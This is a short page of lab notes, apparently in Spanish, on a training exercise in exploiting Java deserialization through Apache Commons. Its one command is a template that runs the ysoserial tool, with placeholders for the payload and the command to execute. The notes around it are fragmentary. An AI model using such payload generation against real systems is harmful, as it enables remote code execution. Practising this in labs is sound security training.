🕸️Laboratorio: Exploiting Java deserialization with Apache Commons

java -jar ysoserial-all.jar \
--add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED \
--add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED \
--add-opens=java.base/java.net=ALL-UNNAMED \
--add-opens=java.base/java.util=ALL-UNNAMED \
[payload] '[command]'

¿Que proceso a hacer?


El comando que finalmente me funcionó de JAVA fue así:

Lo intenté desde mi distro Debian → Con el último Comando:



PreviousLaboratorio: Inyección arbitraria de objetos en PHPNextLaboratorio: Exploiting PHP deserialization with a pre-built gadget chain
Last updated